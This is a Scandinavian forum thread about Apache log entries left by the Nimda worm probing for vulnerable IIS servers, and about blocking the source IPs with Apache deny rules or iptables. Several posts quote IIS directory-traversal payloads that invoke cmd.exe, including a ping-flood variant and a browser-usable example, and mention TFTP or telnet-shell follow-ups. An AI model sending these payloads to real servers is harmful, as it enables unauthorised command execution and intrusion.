blokering af ip'er og evt. anmeldelse til politi eller isp

Synes der er en stigende tendens for folk at komme ind. Her er hvad jeg havde for et stykke tid siden: http://bahh.dk/attack.txt har skrevet til både CC og hans ISP, men det er der ikke kommet noget ud af.

1: Bliver nok svært at anmelde til politiet siden der i princippet ikke er tale om et egentligt strafbart forhold.

2: Tvivler på deres ISP vil gøre noget ved det. Personligt har jeg været ude for en server der blev decideres "defacet" af hackere. Det lykkedes mig at finde frem til de skyldige, deres websider hvor deres exploits scripts o.s.v. lå.

Selvom alt dette materiale blev videregivet til deres isp med tydelige beviser på deres indbrud på min server. har deres isp ikke gjort noget ved det.

Mit råd er:

Smid evt en deny from ip.x.x.x ind i apache httpd, hvis det er så stort et problem.

mht til båndbredde. så har jeg kigget på dine logs.. Det bliver vist ikke meget mere end et par hundrede bytes dagligt... Det betyder næppe noget om så din server kører på en 9600 baud modem :o)

~ det var min 25 øre...

Det er iøvrigt ikke en hacker...direkte....:-)
Det er nimda-virusen der skanner efter sårbare IIS-servere, men det rammer jo ikke dig...;-)
Smil og vær glad for du ikke kører IIS.

Mvh.
Rune Z.

zimmermann >> Smiler nu også :) et forsøg på at hente cmd.exe fra en linux serber, kan snart ik fremkalde andet end et "LOL" :)
Dank >> Hvem siger jeg har mere :) kan godt finde sådan en satan af et modem frem, jeg ved jeg har et, bare ikke liiige hvor jeg har gemt det :)

oz2kas >> Læste i et spm du har svaret på at man kan få en mail om logsne, via et program der hed log2mail, har hentet det, men kan ik helt finde ud af at sætte det op..
Noget du gider hjælpe med når du får en gui igen?

Man kan ellers godt stenge ut en ip eller en serie med ip'er vha linux firewall / iptables.

Du kan anmelde til http://www.dshield.org/
De samler op og skriver ud til de værste "møgspredere"

Snyd, jeg har kun 2 af dem i min log, endda fra samme host :(

xxxxxxxxx.dsl-verizon.net - - [03/Sep/2002:03:06:03 +0200] "\xc0R\x01@\x03GET /scripts/..%255c..%255c../winnt/system32/cmd.exe?/c+ping+-n+1500+-w+657+-l+65500+216.207.xxx.xxx HTTP/1.0" 501 455 "-" "-"
xxxxxxxxxx.dsl-verizon.net - - [03/Sep/2002:20:30:49 +0200] "\xc0R\x01@\x03GET /scripts/..%255c..%255c../winnt/system32/cmd.exe?/c+ping+-n+1+-w+657+-l+500+4.46.xxx.xxx HTTP/1.0" 501 449 "-" "-"

Ser ud som om en eller anden prøver et DoS attack mod en host, hvorefter den sender en ping pakke til sig selv, måske for at sikre sig at det lykkedes... Klamt trick, men min RedHad box er da bare ligeglad :)

Dette var da ganske interresant. Det ser da ut til at noen forsøker å hacke inn i NT/2000 maskiner ja. Hva betyr egentlig denne linjen:

80.8.215.224 - - [27/Oct/2002:10:27:51 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"

Hvilken log er dette egentlig fra ? 80.8.215.224 må da være avsender ip !!?? Hvordan har kommandoen "GET ..." egenlig kommet inn i linuxmaskinen ? Er den sendt som en "form parameter" i html eller hva ? Den maskinen som denne kommandoen har kommet inn til kjører altså web server, slik at "noen" alstså har forsøkt å manipulere programmene på en NT/2000 maskin, som kjører web server, ved å sende med parametre til en form eller en vanlig html side, hvor ved altså denne parametrsrengen eventuelt skulle kunne manipulere programvaren på serveren ????!! Har jeg forstått dette rett ??? I så fall ganske interressant ! (Og skummelt.)

Eller er det slik at de "bare" med kommandoen get har forsøkt å lese filinnholdet fra bestemte filer ?? Noen forslag eller teorier om dette ???!!

GET brukes da for ftp for å hente inn filer, men dette er vel ingen log for ftp aktivitet ?? GET også i dos eller hva ????

Det finnes jo ellers søkeroboter på nettet som utfører forholdsvis legal aktivitet for å kartlegge servere og slikt. Det kan ikke i all enkelhet være sporene etter en slik ? Hvordan vil ellers en "normal" loggføring eller entry i denne loggen se ut ??

Langbein: Det er en nimbda der søker ip-nettet igennem efter "unptatchede" IIS webservere. Hvis du kører med seneste version samt patches, så er der ingen problem.

http://www.netadmintools.com/modules.php?name=News&new_topic=27

dank: Interresant, en orm, er ikke dette noenlunde det samme som en "trojansk hest", mon tro ? Da er det altså noen som forsøker å utføre systemkommandoer på NT/Win 2000 via IIS Web server !! Men hvordan ia lle dager kan disse strengene med systemkommandoer komme inn i webserveren (og videre inn i operativsystemet) ???

Nu nævner nogen af jer iptables...
Jeg er lidt noob til linux :) har i jo nok også været engang!
Hvordan sætter jeg dem op på min debian?

langbein > Det du ser der er en access log fra Apache, eller en apache style log fil. GET er den måde browseren har valgt at hente filen på, det andet viser at de har forsøgt at udnytte en bug i nogle versioner af IIS til at udføre en dir kommando på værtsmaskinen.

De to entries jeg postede stammer fra min egen Apache log, og viser at nogen har forsøgt at bruge samme IIS bug til at lave et DoS angreb med ping pakker (Testede med flood ping på linux or stor pakkestørelse via loopback, og den nåede små 36MBit som max, altså ret effektivt)

Så det er noget skummelt noget, men det er kun IIS og muligvis andre buggy webservere på windows NT/2K/XP der er sårbare..

det var da triist :)
var der nogen der kunne sige mig det med iptables??

iptables: google eller nyt spørgsmål

(fordi hvis andre også skal have glæde af svaret så skal det være søgbart her på eksperten.dk)

Dank >> Jeg har jo spurgt om hvordan jeg blokker for disse ip'er i det her spm... så jeg kan ik helt se grunden til et nyt spm!
Men det skal ikke være med iptable's, vil da gerne høre om andre muligheder
Søgemaskinen søger også inde i spm's

chanoa -> Da må vel data komme inn via port 80 til web server via "mekaniskmer" som enten er de man benytter eller ligner på dem man benytter ved for eksempel databaseoppslag via web ??!! Dette er da kvlitativt noe helt annet enn det som vi vanligvis tenker på som "virus" slik som jeg ser det. (Typisk makro programkode i vedlegg til Outlook, Word, Exel, eller kode kompilert inn eller på annen måte brakt inn i exekverbare filer slike som .exe og .com) Takker for disse interresante opplysningene.

Webmasterdk -> Får vel være litt enig med Dank, men helt kort og generelt: Linux kernel har en innebygget felles mekanisme for filtrering og routing av ippakker som heter netfilter: http://www.netfilter.org Det finnes to tekstbaserte grensesnitt for kommuniasjon mot Linux kernel ifb med konfigurering av netfilter. Dette er ipchains og iptables. Iptables er den nyeste av disse. Iptables kan enten konfigurere firewall via enkle kommandoer eller via en liten "batch" av kommandoer det vil si script. Netfilter kan sjekke hver enkelt ippakke ut fra forskjellige kriteria, for eksempel avsender og mottaker ip, og .... <Nytt Spørsmål>  :-)

langbein > Tja, både og, programmet det laver de numre er en trojansk hest eller en virus. Selve angrebet går ud på at nogle webserver har hul i hovdet, og tillader at man keg hente filer uden for webscope ved at bruge en passende mængde af ../ det kan udnyttes til at køre cmd.exe der er kommando fortolkeren på win NT/2K/XP og på den måde kan man få stort set fuld kontrol over maskinen...

Men hvor befinner den trojanske hest seg på hvilken maskin ? På den maskin der ip'ene opptrer eller på en annen maskin. Hvis på en annen maskin, hvordan forflytter data seg fra denne maskin til den maskin som blir angrepet. (For Linux maskinen har vel ikke fått installert en trojansk hest, eller hva ??)(Hvis ikke hvor befinner seg da den trojanske hest som står for angrepet, og som sagt .. overføring av data fra eventuell "trojansk hest maskin" til det angrepne mål ???

Hesten er på det computer der laver forbindelsen... Du kunne i princippet lave det samme i en browser, bare skrive http://victem/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

Det ville give noget i stil med det her i browseren hvis victem er et sårbart system:


Enheden i drev D har ikke noget navn
Enhedens serienummer er 1708-195E
Indhold af D:\Desktop

.              <DIR>        03-11-01  16.53 .
..            <DIR>        03-11-01  16.53 ..
TRILLIAN LNK          424  16-09-02  0.17 Trillian.lnk
BILLEDER      <DIR>        01-05-02  0.07 Billeder
NIKKI          <DIR>        17-03-02  2.13 Nikki
DIV            <DIR>        05-02-02  15.38 div
DATABA~1      <DIR>        06-04-02  15.08 Database Backups
HLSW    LNK          373  02-09-02  22.47 HLSW.lnk
WEBSHO~1 LNK          363  17-09-02  19.36 Webshots Desktop!.lnk
SNAGIT~2 LNK          434  01-07-02  17.37 SnagIt Studio 6.lnk
NETMAN        <DIR>        18-05-02  15.58 netman
OUTLOO~1 LNK          430  30-10-02  8.54 Outlook Express with OE-QuoteFix.lnk
COUNTE~1 LNK          412  24-07-02  18.59 Counter Strike.lnk
LYD            <DIR>        17-02-02  20.23 lyd
STREAM~1 LNK          395  22-09-02  13.58 Streamload Uploader.lnk
SKINNER  LNK          373  30-05-02  15.36 Skinner.lnk
        27 fil(er)    400.652.938 byte
        19 mappe(r)        1.156,84 MB ledig

Altså output fra dir kommandoen. Her skrivebordet fra min egen windows ME computer i en noget forkortet udgave ;)

Data kan på NT/XP/2K overføres med TFTP uden det store besvær, eller man kunne måske endda lave en shell man kunne forbinde til via telnet.. Det er kun op til angriberens fantasi hvad der er muligt hvis man har fuld adgang til systemet.

OK, OK, takker :)

Det var så lidt ;)

Men jeg synes bare stadig ik at jeg har fået svar på mit hoved spm..
Jeg citerer fra titlen af mit spm: "blokering af ip'er og evt. anmeldelse til politi eller isp"
....

Blokering af IP'er:

Benyt Deny i apache.httpd - Det er jo trods alt din webserver der får disse forspørgelser. Der er næppe nogen grun til at benytte iptables til dette.

Her står det vel litt om iptables og mye annet.
http://www.eksperten.dk/spm/277232

Hvis du skal blokkere en avsender ip med en enkelt setning i iptables så holder det vel med å kjøre en enkelt kommando, omtrent noe slikt:

iptables -A INPUT -s <slem ip adresse> -j DROP

Denne setningen kan kjøres kun alene eller den kan settes inn i et firewall script. (Testet den akkurat nå og det fungerte.)

"iptables -A INPUT -s <slem ip adresse> -j DROP"

Hvis altså webserveren ligger på den samme PC som routeren. Ellers er det nok forwarding du skal bruge

iptables -A FORWARD -s <slem ip adresse> -j DROP

:o)

Yes !!